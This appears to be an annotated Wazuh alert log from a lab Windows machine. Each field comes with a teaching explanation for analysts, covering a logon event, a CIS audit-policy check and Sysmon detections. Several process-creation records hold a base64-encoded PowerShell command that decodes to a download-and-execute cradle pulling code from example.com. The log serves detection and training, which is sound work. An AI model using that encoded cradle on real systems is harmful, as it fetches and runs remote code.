agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534435.2092495 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:32.6880136Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43881 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 111 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534436.2099830 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:34.0647314Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286041 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:32.540
ProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00}
ProcessId: 2532
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00}
ParentProcessId: 16696
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:32.540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bde0-680a-d80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16696 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 115 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534436.2107897 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:34.2997910Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286042 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:34.252
ProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00}
ProcessId: 2532
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_twhlr5xs.n4e.ps1
CreationUtcTime: 2025-04-24 22:40:34.252
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:34.252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bde0-680a-d80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_twhlr5xs.n4e.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:34.252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534437.2110662 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26162 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Authentication Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in authentication policy. Events for this subcategory include: - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4713: Kerberos policy was changed. - 4716: Trusted domain information was modified. - 4717: System security access was granted to an account. - 4718: System security access was removed from an account. - 4739: Domain Policy was changed. - 4864: A namespace collision was detected. - 4865: A trusted forest information entry was added. - 4866: A trusted forest information entry was removed. - 4867: A trusted forest information entry was modified. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authentication Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Authentication Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Authentication Policy Change"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 112 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534438.2114357 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:36.5211059Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286074 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:35.479
ProcessGuid: {94294ddc-bde3-680a-db0b-000000000e00}
ProcessId: 6708
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00}
ParentProcessId: 2532
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:35.479 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bde3-680a-db0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6708 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
